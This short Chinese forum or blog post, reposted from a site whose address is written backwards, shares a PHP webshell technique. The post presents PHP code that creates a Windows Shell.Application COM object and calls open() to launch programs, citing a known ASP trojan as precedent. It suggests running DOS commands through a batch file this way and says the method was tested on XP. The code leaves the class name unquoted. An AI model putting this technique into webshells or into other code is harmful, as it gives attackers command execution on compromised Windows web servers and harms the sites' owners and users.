摘自teN.potgnayiaH.wwW vbs小鋪
關於用Shell.Application來執行程序,在海陽頂端asp木馬裡已有示例。用的是ShellExecute 這個方法。
今天試了一下,用open也可以。php代碼如下,我好像還沒有在php的webshell中看到相關方法
<?php
$wsh = new COM(Shell.Application) or die("Shell.Application");
$exec = $wsh->open("c:\windows\system32\notepad.exe");
//沒有回顯,多了個notepad進程,可以寫一個批處理來運行dos命令。open換用ShellExecute 也可。
?>
xp+APMServ5.2.0測試通過